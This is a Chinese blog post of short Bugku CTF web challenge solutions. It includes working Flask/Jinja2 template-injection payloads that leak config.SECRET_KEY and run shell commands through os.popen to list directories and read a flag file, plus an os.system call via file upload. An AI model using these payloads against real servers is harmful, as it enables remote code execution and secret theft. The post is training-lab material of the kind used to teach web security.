CTFbugku

最新推荐文章于 2024-09-06 13:45:00 发布
最新推荐文章于 2024-09-06 13:45:00 发布
阅读量398 收藏 4
点赞数 11
分类专栏: CTFbugku 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lhdbk______/article/details/140805584
版权

第一题:Simple_SSTI_1

查看源代码:

在flask里,我们建立一个SECRET_KEY,上方模板注入

直接访问URL+?flag={{ config.SECRET_KEY}}得到flag。

第二题:Simple_SSTI_2

ls列举出文件夹中的文件

{{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}

{{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}

用cat打开这个文件浏览

{{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}

 

第三题:Flask_FileUpload

查看源代码:

在文档中输入:

import os

os.system('ls / ')

在里面找flag

 

第四题:滑稽

查看源代码flag{b4d196d1edbc6a09845c41732553aa13}

第五题:计算器

正确就会有flag,两位数就会需要打开代码修改长度

第六关:get

根据代码:?what=flag

第七关:post

根据代码:使用HackBar

lhdbk______
关注
专栏目录
ctfbugkuweb
OUDzhh的博客
03-30 454
5:矛盾原题链接:http://120.24.86.145:8002/get/index1.php题目要求我们GET一个is_numeric()不是数字而又==1所以我们可以将1用科学计数法改为1*e*0.1构造一个简单的 payload.即得到flag(这一题做的时候我查了一下is_numeric函数和了解了一下科学计数法)6:WEB3原题链接:http://120.24.86.145:8002...
ctfbugku——计算器
weixin_40980428的博客
03-22 3877
看到此界面先打开链接,打开后如下图所示这难道是简单的输入运算结果吗?我们输入答案95却发现只能输入一位数;然后我们打开源代码看看是哪出了问题原来是限制了字符串输入长度(maxlength="1"),现在我们将它改为2,然后返回刚才的验证页面输入答案95,点击验证。这时flag就弹出来了,是不是很简单呢,可是小白现在只学会了这个...
CTFbugkuweb基础
OUDzhh的博客
03-30 535
3:WEB基础$_GET原题链接:http://120.24.86.145:8002/打开题目链接,查看源码发现只要把flag赋值给what就可以获得flag(firefox hackbar插件)4:WEB基础$_POST原题链接:http://120.24.86.145:8002/post/一道很简单的post题 直接用firefox的hackbar插件得到flag...
CTFbugku--菜鸟初学
weixin_30888027的博客
09-18 109
1.首先打开这个图片 2.用记事本打开这个图片 3.发现文件的结果有一段unicode代码,然后通过在线转码 转换成ASCII码 第一个CFT题就这样解决了O(∩_∩)O 转载于:https://www.cnblogs.com/baifan2618/p/7545804.html...
bugku CTF】POST、头等舱、网站被黑、alert、你必须让他停下、本地管理员、bp
m0_63563528的博客
02-01 1318
burpsuite抓包、爆破等模块的使用,hackbar的使用
BugKu----游戏过关逆向题解
m0_63581842的博客
02-13 2286
开始的思路是,找到主函数去分析,速度比较慢,定位出现flag的函数;高效解题:可以直接用shift+F12直接去搜索flag,定位flag的位置。以下是综合自己的想法和网上的题解写的,有些复杂,记录自己写逆向题过程,希望对你有所帮助。将题目解压,发现是exe文件;拖入exeinfope查看对应程序的位数架构;看到是32位数拖入对应位数的ida,ida为以下界面:按tab键,进行反编译,得到下列的main函数分析main函数,双击main_0得到下面的界面看到题目要求,flag有 zsctf,【自己开始的思路
bugkuCTF
Vincent0sen的博客
10-26 486
有时间再说,持续更新。
bugku——文件上传——web——shell
m0_75007575的博客
05-04 292
explode() 函数使用一个字符串分割另一个字符串,并返回由字符串组成的数组。separator:在哪里分割字符串。limit:规定数组元素的个数。string:要分割的字符串。
【BUUCTF】JustRE
m0_68259687的博客
06-09 198
分析下来发现,主函数中不存在和flag有关的信息。双击 aBjdDD2069a4579。flag为将19999和0填入字符串中。发现一个疑似flag的字符串。按x寻找相关联,之后反编译。
CTFBugku网站被黑
weixin_41607190的博客
09-25 9780
点开是这么一个页面 晃来晃去还挺好玩的 标题是网站被黑,用御剑扫描一下他的后台,看能不能扫到webshell,也就是一个后门。(不了解webshell的童鞋去搜下) 扫一下就出来了 点进去是一个输入密码的界面,那么接下来就去爆破密码,用的工具是BurpSuite pro,后面会给大家放上来。 首先要抓包,就是用Burp Suite去截取网页的请求。 ...
BugKuCTF WEB
让我再浪一会 的博客
11-24 877
文章目录BugKuCTF WEB一、web2二、计算器三、web基础$_GET四、web基础$_POST五、矛盾六、web3七、域名解析八、你必须让他停下九、变量1十、web5十一、头等舱十二、网站被黑十三、管理员系统十四、web4十五、flag在index里十六、输入密码查看flag BugKuCTF WEB 平台地址 一、web2 进入网页,查看源代码,在其中找到flag 二、计算器 进入网页,根据题目可得知需要输入运算结果,但限制了输入的数字的个数,查看网页的JS代码,将 maxlength =
Bugku--CTF-- 1、本地管理员 2、网站被黑
记录笔记
07-07 1282
Bugku--CTF--1、本地管理员 2、网站被黑
CTF-Bugku逆向题Android方法归纳
am_03的博客
08-28 1413
1.signin题目: reverse() 功能:反转数组里的元素的顺序 语法:arrayobject.reverse.() 这类方法会改变原来的数组,不可逆转 tostring() 功能:将各类进制的数字转化为字符串 语法:number.toString(radix)(radix代表进制数) 字符串的管理地方是string.xml java在引用函数时要倒着引用 StringBuffer 当对字符串进行修改的时候,需要使用 StringBuffer 和 StringBuilder 类。 和 String
BugkuCTF-WEB题速度要快
am_03的博客
08-28 747
打开网页,只看到一句话:我感觉你得快点!!! F12查看源代码 发现了提示:OK ,now you have to post the margin what you find 需要以POST方式传参,先用BrupSuite抓包看一下 1、使用BrupSuite抓包并重新发送 发送后看到flag 2、使用base64解码 跑的还不错,给你flag吧: MTMyOTIx 3、继续进行一次base64解码 4、通过post方法上传margin=132921 还要再快点,看来有时间限制,不过已经有了思路
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
最新发布
2401_84466224的博客
09-06 1583
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
什么是网络安全
网络研究观
09-04 2602
了解不同类型的网络安全和主要形式的网络威胁。
【网络安全】漏洞挖掘
anquan2233的博客
08-29 1697
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全(黑客)自学
白帽子凯哥聊黑客
09-04 1453
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全知识:什么是访问控制列表 (ACL)?
2401_84434570的博客
09-04 1014
使用 ACL 的操作系统包括 Microsoft Windows NT/2000、Novell 的 Netware、Digital 的 OpenVMS 和基于 UNIX 的系统。通常,标准 ACL 实施在靠近其要保护的目的地的位置,而扩展 ACL 则放置在靠近源的位置。ACL 有多种形式,每种形式都适用于不同的场景,并提供不同级别的控制和复杂性。每个对象都与一个安全属性相关联,该属性将其链接到其 ACL,其中包含每个具有该对象访问权限的用户的条目。将最常触发的规则置于 ACL 的顶部以优化性能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值